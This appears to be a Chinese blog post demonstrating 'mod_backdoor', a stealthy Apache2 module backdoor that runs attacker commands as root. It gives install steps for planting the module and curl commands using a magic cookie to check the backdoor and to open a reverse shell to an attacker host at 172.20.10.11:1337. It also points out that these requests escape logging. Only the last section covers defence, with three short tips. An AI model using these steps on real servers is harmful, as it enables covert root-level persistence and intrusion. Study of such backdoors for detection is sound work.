Apache2之隐形后门

gclome

原文链接：Apache2之隐形后门

0x00:简介

    mod_backdoor是使用Apache2模块的隐形后门。

    主要思路是在Apache2进程加载其配置后对其进行fork()处理。由于它是在root用户将进程转移到www-data之前创建的，因此您可以root身份执行命令。
    由于Apache2仅在(重新)启动时才加载其配置，因此面临的难度是防止apache2进程挂掉，因此来到达维持权限的目的！！！
    当攻击者在目标服务器植入后门以后 , 一旦攻击者向服务器发送的HTTP请求存在 Backdoor这个请求头 , Backdoor 这个请求头的值作为命令执行。


0x01:过程

    1、环境部署

靶机：apache  kali  172.20.10.3

攻击：mac  172.20.10.11

采用github现有的项目:

1. https://github.com/VladRico/apache2_BackdoorMod

复制代码

​

    将两个文件分别放入apache对应的目录位置
    将mod_backdoor.so文件复制到 /usr/lib/apache2/modules/目录下
​
    将backdoor.load文件复制到 /etc/apache2/mods-available/目录下
​
靶机执行命令：
命令一:a2enmod backdoor
命令二:systemctl restart apache2
执行完以上两个命令后让后门模块生效
2、后门测试
mac 攻击
​

1. curl -H 'Cookie: password=backdoor' http://172.20.10.3:8080/ping

复制代码

显示"后门模块正在运行"

用攻击者电脑启动NC监听

接着执行

1. curl -H 'Cookie: password=backdoor' http://172.20.10.3:8080/reverse/172.20.10.11/1337/bash

复制代码

反弹shell

命令解析:/reverse/172.20.10.11/1337/bash
172.20.10.11:shell接收IP
1337:shell接收端口
bash:shell反弹方式
​​​

1. 回显：Sending Reverse Shell to 172.20.10.11:1337 using bash

复制代码

shell反弹成功


​
    优势:在于日志不会记录每个包含此cookie的请求!!!!

0x02:防范
1、检查以下目录是否存在异常模块。

1. /etc/apache2/mods-available/
   
2. /usr/lib/apache2/modules/

复制代码

2、定时重启服务器。

3、部署其他流量捕获的设备